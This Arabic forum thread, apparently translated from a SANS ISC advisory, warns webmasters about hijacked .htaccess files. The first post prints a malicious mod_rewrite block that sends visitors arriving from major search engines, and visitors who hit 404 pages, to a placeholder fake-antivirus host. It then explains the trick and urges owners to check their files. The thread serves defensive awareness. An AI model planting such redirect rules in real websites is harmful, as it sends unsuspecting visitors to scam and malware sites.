النتائج 1 إلى 4 من 4

الموضوع: راقب ملف htaccess في موقعك

  1. #1
    عضو برونزي الصورة الرمزية باحث عن المعرفة
    تاريخ التسجيل
    Aug 2007
    المشاركات
    1,629
    معدل تقييم المستوى
    24

    راقب ملف htaccess في موقعك

    قام الأشخاص السيئون (crackers) باستغلال RewriteEngine في apache بطريقة سيئة لتحويل الزوار إلى مواقع مزورة لمنتجي برامج مكافحة الفيروس. خاصية RewriteEngine يمكن تفعيلها من خلال ملف htaccess لاحظ المثال التالي:


    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* https://BAD_SITE/in.html?s=hg [R,L]
    Errordocument 404 https://BAD_SITE/in.html?s=hg_err
    RewriteEngine On
    سوف تفعل الخاصية

    الجمل الست التي تليها هي شروط إعادة كتابة العنوان.

    هذه الجمل تفحص ال HTTP_REFERER وكما هو ظاهر فهي تتضمن بعض أشهر محركات البحث. عند تحقق أي شرط من هذه الشروط سيتم تنفيذ جملة RewriteRule.

    كما هو ظاهر من الصيغة أعلاه فهي طريقة خبيثة للغاية حيث أن المستخدم عند زيارته للموقع من خلال عنوان الموقع المباشر فلا شيء سوف يحدث لكن حين زيارته من خلال موقع بحث من المواقع المذكورة في الشروط فسوف يتم تحويل المستخدم إلى الموقع المزور.

    لذلك إذا كان لديك موقع يستخدم htaccess (أو حتى لا يستخدمه) فقم بفحصه وتأكد من أنه لم يتم تغييره.

    ملاحظة: هذا شرح مترجم لمقالة وردت في موقع isc.sans.org
    [CENTER][SIZE="5"][COLOR="Red"]كلّنا ليبيّون[/COLOR][/SIZE][/CENTER]

    [CENTER]
    [IMG]https://www.arabhardware.net/forum/picture.php?albumid=282&pictureid=1037[/IMG]
    [/CENTER]

  2. #2
    عضو فضي الصورة الرمزية adam black ice
    تاريخ التسجيل
    Mar 2006
    المشاركات
    2,072
    معدل تقييم المستوى
    21

    رد: راقب ملف htaccess في موقعك

    مشكور جدا على هذه المعلومه القيمه

    Knowledge is belong to human

  3. #3
    عضو ذهبي الصورة الرمزية Bahaa Hamam
    تاريخ التسجيل
    Jul 2008
    المشاركات
    2,482
    الدولة: Egypt
    معدل تقييم المستوى
    21

    رد: راقب ملف htaccess في موقعك

    مشكور كتير لك اخي

  4. #4
    عضو برونزي الصورة الرمزية باحث عن المعرفة
    تاريخ التسجيل
    Aug 2007
    المشاركات
    1,629
    معدل تقييم المستوى
    24

    رد: راقب ملف htaccess في موقعك

    حيّاكم الله إخواني وجزاكم الله خيراً على مروركم الطيب
    [CENTER][SIZE="5"][COLOR="Red"]كلّنا ليبيّون[/COLOR][/SIZE][/CENTER]

    [CENTER]
    [IMG]https://www.arabhardware.net/forum/picture.php?albumid=282&pictureid=1037[/IMG]
    [/CENTER]

المواضيع المتشابهه

  1. مشاركات: 1
    آخر مشاركة: 08-07-2012, 21:42
  2. مشاركات: 5
    آخر مشاركة: 26-04-2010, 21:10

الكلمات الدلالية لهذا الموضوع

المفضلات

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •